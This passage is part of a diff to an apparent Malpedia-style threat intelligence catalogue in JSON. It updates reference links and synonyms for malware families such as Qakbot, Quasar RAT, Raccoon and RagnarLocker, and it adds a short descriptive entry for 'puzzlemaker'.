"https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/" ], "synonyms": [], "type": [] @@ -25042,6 +28561,19 @@ "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", "value": "Putabmow" }, + { + "description": "The dropper module is used to install two executables that pretend to be legitimate files belonging to Microsoft Windows OS. One of these files (%SYSTEM%\\WmiPrvMon.exe) is registered as a service and is used as a launcher for the second executable. This second executable (%SYSTEM%\\wmimon.dll) has the functionality of a remote shell and can be considered the main payload of the attack. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker", + "https://securelist.com/puzzlemaker-chrome-zero-day-exploit-chain/102771/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "2c835470-1bd2-4bd6-a83b-e9c3e12fa0ad", + "value": "puzzlemaker" + }, { "description": "", "meta": { @@ -25061,25 +28593,29 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwndlocker", "https://norfolkinfosec.com/tinypos-and-prolocker-an-odd-relationship/", - "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/", - "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", + "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", "https://www.intrinsec.com/egregor-prolock/", - "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.bleepingcomputer.com/news/security/new-pwndlocker-ransomware-targeting-us-cities-enterprises/", - "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://www.group-ib.com/blog/prolock_evolution", "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", - "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji", - "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://soolidsnake.github.io/2020/05/11/Prolock_ransomware.html", + "https://news.sophos.com/en-us/2020/07/27/prolock-ransomware-gives-you-the-first-8-kilobytes-of-decryption-for-free/", "https://www.group-ib.com/blog/prolock", - "https://www.bleepingcomputer.com/news/security/pwndlocker-ransomware-gets-pwned-decryption-now-available/" + "https://www.cert-pa.it/notizie/pwndlocker-si-rinnova-in-prolock-ransomware/", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", + "https://id-ransomware.blogspot.com/2019/10/pwndlocker-ransomware.html", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.group-ib.com/blog/prolock_evolution", + "https://www.zdnet.com/article/fbi-prolock-ransomware-gains-access-to-victim-networks-via-qakbot-infections/", + "https://www.it-klinika.rs/blog/paznja-novi-opasni-ransomware-pwndlocker-i-u-srbiji" ], "synonyms": [ "ProLock" @@ -25184,10 +28720,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", - "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", - "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", - "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://securityintelligence.com/meanwhile-britain-qadars-v3-hardens-evasion-targets-18-uk-banks/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://securityintelligence.com/an-analysis-of-the-qadars-trojan/", + "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", + "https://www.johannesbader.ch/2016/04/the-dga-of-qadars/", "https://www.welivesecurity.com/2013/12/18/qadars-a-banking-trojan-with-the-netherlands-in-its-sights/" ], "synonyms": [], @@ -25201,64 +28738,100 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", + "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", + "https://quosecgmbh.github.io/blog/grap_qakbot_strings.html", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", + "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://cybersecurity.att.com/blogs/labs-research/the-rise-of-qakbot", "https://raw.githubusercontent.com/fboldewin/When-ransomware-hits-an-ATM-giant---The-Diebold-Nixdorf-case-dissected/main/When%20ransomware%20hits%20an%20ATM%20giant%20-%20The%20Diebold%20Nixdorf%20case%20dissected%20-%20Group-IB%20CyberCrimeCon2020.pdf", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://blog.quosec.net/posts/grap_qakbot_navigation/", "https://www.hornetsecurity.com/en/security-information/qakbot-malspam-leading-to-prolock/", "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", - "https://research.checkpoint.com/2020/exploring-qbots-latest-attack-methods/", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", - "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", - "https://twitter.com/redcanary/status/1334224861628039169", - "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", - "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", - "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", - "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", - "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", - "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", - "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.group-ib.com/blog/egregor", - "https://www.intrinsec.com/egregor-prolock/", - "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://malwareandstuff.com/upnp-messing-up-security-since-years/", - "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", - "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", - "https://hatching.io/blog/reversing-qakbot", - "https://www.secureworks.com/research/threat-profiles/gold-lagoon", - "https://blog.talosintelligence.com/2019/05/qakbot-levels-up-with-new-obfuscation.html", - "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", - "https://www.youtube.com/watch?v=iB1psRMtlqg", - "https://blog.quosec.net/posts/grap_qakbot_strings/", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", - "https://twitter.com/TheDFIRReport/status/1361331598344478727", - "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", - "https://content.fireeye.com/m-trends/rpt-m-trends-2020", - "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", - "http://contagiodump.blogspot.com/2010/11/template.html", - "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-countermeasures/", - "https://www.group-ib.com/blog/prolock_evolution", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-3/", + "https://twitter.com/ChouchWard/status/1405168040254316547", + "https://securelist.com/qakbot-technical-analysis/103931/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://twitter.com/_alex_il_/status/1384094623270727685", + "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", + "https://blog.talosintelligence.com/2016/04/qbot-on-the-rise.html", + "https://drive.google.com/file/d/1mO2Zb-Q94t39DvdASd4KNTPBD8JdkyC3/view", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://isc.sans.edu/diary/rss/26862", + "https://blog.vincss.net/2021/03/re021-qakbot-dangerous-malware-has-been-around-for-more-than-a-decade.html", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-lagoon", + "https://blog.quosec.net/posts/grap_qakbot_strings/", + "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", + "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-qakbot-zip-based-campaign/", + "https://seguranca-informatica.pt/a-taste-of-the-latest-release-of-qakbot", + "https://www.intrinsec.com/egregor-prolock/", + "https://hatching.io/blog/reversing-qakbot", + "https://blog.morphisec.com/qakbot-qbot-maldoc-two-new-techniques", + "https://malwareandstuff.com/an-old-enemy-diving-into-qbot-part-1/", + "https://www.vkremez.com/2018/07/lets-learn-in-depth-reversing-of-qakbot.html", + "https://threatresearch.ext.hp.com/detecting-ta551-domains/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs", + "https://malwareandstuff.com/upnp-messing-up-security-since-years/", + "https://quosecgmbh.github.io/blog/grap_qakbot_navigation.html", + "https://0xthreatintel.medium.com/reversing-qakbot-tlp-white-d1b8b37ad8e7", + "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", + "https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/", + "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", + "https://www.securityartwork.es/2021/06/16/analisis-campana-emotet/", + "https://blog.reversinglabs.com/blog/spotting-malicious-excel4-macros", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.crowdstrike.com/blog/duck-hunting-with-falcon-complete-analyzing-a-fowl-banking-trojan-part-1/", + "http://contagiodump.blogspot.com/2010/11/template.html", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.f5.com/labs/articles/threat-intelligence/qbot-banking-trojan-still-up-to-its-old-tricks", - "https://isc.sans.edu/diary/rss/26862" + "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/", + "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917", + "https://blog.quosec.net/posts/grap_qakbot_navigation/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://madlabs.dsu.edu/madrid/blog/2021/04/30/qbot-analyzing-php-proxy-scripts-from-compromised-web-server/", + "https://twitter.com/redcanary/status/1334224861628039169", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://perception-point.io/insights-into-an-excel-4-0-macro-attack-using-qakbot-malware", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", + "https://www.secureworks.com/research/threat-profiles/gold-lagoon", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://twitter.com/elisalem9/status/1381859965875462144", + "https://www.group-ib.com/blog/egregor", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://www.0ffset.net/reverse-engineering/malware-analysis/qakbot-browser-hooking-p1/", + "https://securityintelligence.com/news/qbot-malware-using-windows-defender-antivirus-lure/", + "https://www.youtube.com/watch?v=iB1psRMtlqg", + "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/", + "https://n1ght-w0lf.github.io/malware%20analysis/qbot-banking-trojan/", + "https://twitter.com/TheDFIRReport/status/1361331598344478727", + "https://www.um.edu.mt/library/oar/handle/123456789/76802", + "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://blog.group-ib.com/prometheus-tds", + "https://intel471.com/blog/ettersilent-maldoc-builder-macro-trickbot-qbot/", + "https://www.bleepingcomputer.com/news/security/fujifilm-shuts-down-network-after-suspected-ransomware-attack/", + "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", + "https://www.group-ib.com/blog/prolock_evolution" ], "synonyms": [ "Pinkslipbot", @@ -25323,9 +28896,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign", "https://blog.morphisec.com/cinarat-resurfaces-with-new-evasive-tactics-and-techniques", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://securelist.com/apt-trends-report-q1-2021/101967/", + "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", "https://www.secureworks.com/research/threat-profiles/aluminum-saratoga", "https://twitter.com/malwrhunterteam/status/789153556255342596", "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", @@ -25335,6 +28912,7 @@ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_0_JPCERT_en.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://blog.minerva-labs.com/trapping-quasar-rat", "https://0x00sec.org/t/master-of-rats-how-to-create-your-own-tracker/20848", "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", "https://blog.malwarelab.pl/posts/venom/", @@ -25345,11 +28923,14 @@ "https://blog.reversinglabs.com/blog/rats-in-the-library", "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://www.zscaler.com/blogs/research/shellreset-rat-spread-through-macro-based-documents-using-applocker-bypass", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", "https://www.fortinet.com/blog/threat-research/uncovering-new-activity-by-apt-", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/", @@ -25357,6 +28938,7 @@ "https://threatpost.com/apt-exploits-zerologon-targets-japanese-companies/161383/", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols", "https://www.antiy.cn/research/notice&report/research_report/20201228.html", "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/" @@ -25402,19 +28984,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon", - "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", - "https://www.youtube.com/watch?v=1dbepxN2YD8", - "https://www.group-ib.com/blog/fakesecurity_raccoon", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://www.youtube.com/watch?v=5KHZSmBeMps", - "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", "https://www.riskiq.com/blog/labs/magecart-medialand/", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", - "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", + "https://www.zerofox.com/blog/raccoon-stealer-pivots-towards-self-protection/", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", + "https://www.group-ib.com/blog/fakesecurity_raccoon", + "https://news.sophos.com/en-us/2021/09/01/fake-pirated-software-sites-serve-up-malware-droppers-as-a-service/", + "https://therecord.media/malware-group-leaks-millions-of-stolen-authentication-cookies/", "https://lp.cyberark.com/rs/316-CZP-275/images/CyberArk-Labs-Racoon-Malware-wp.pdf", - "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf" + "https://webcache.googleusercontent.com/search?q=cache:AvJw47-V_WwJ:https://ultrahacks.org/shop/product/raccoon-stealer-onion-panel/+&cd=1&hl=en&ct=clnk&gl=ch&client=firefox-b-d", + "https://medium.com/s2wlab/deep-analysis-of-raccoon-stealer-5da8cbbc4949", + "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", + "https://www.youtube.com/watch?v=1dbepxN2YD8", + "https://www.secfreaks.gr/2019/12/in-depth-analysis-of-an-infostealer-raccoon.html", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.bitdefender.com/files/News/CaseStudies/study/289/Bitdefender-WhitePaper-Fallout.pdf", + "https://www.cybereason.com/blog/hunting-raccoon-stealer-the-new-masked-bandit-on-the-block", + "https://blog.malwarebytes.com/social-engineering/2020/09/malvertising-campaigns-come-back-in-full-swing/", + "https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-raccoon-infostealer" ], "synonyms": [ "Mohazo", @@ -25457,25 +29048,37 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker", - "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", "https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://seguranca-informatica.pt/ragnar-locker-malware-analysis/", + "http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1", + "https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html", + "https://twitter.com/AltShiftPrtScn/status/1403707430765273095", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", + "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", "https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/", + "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", + "https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/", + "https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/", + "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", + "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/", "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", - "https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/", - "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", - "https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/", - "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", - "https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf", - "https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/", - "https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html", - "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/", "https://securelist.com/targeted-ransomware-encrypting-data/99255/", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information" + "https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf" ], "synonyms": [], "type": [] @@ -25488,10 +29091,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok", - "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://news.sophos.com/en-us/2020/05/21/asnarok2/", "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://news.sophos.com/en-us/2020/05/21/asnarok2/" + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw", + "https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/" ], "synonyms": [], "type": [] @@ -25504,6 +29109,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware" ], "synonyms": [], @@ -25559,6 +29167,7 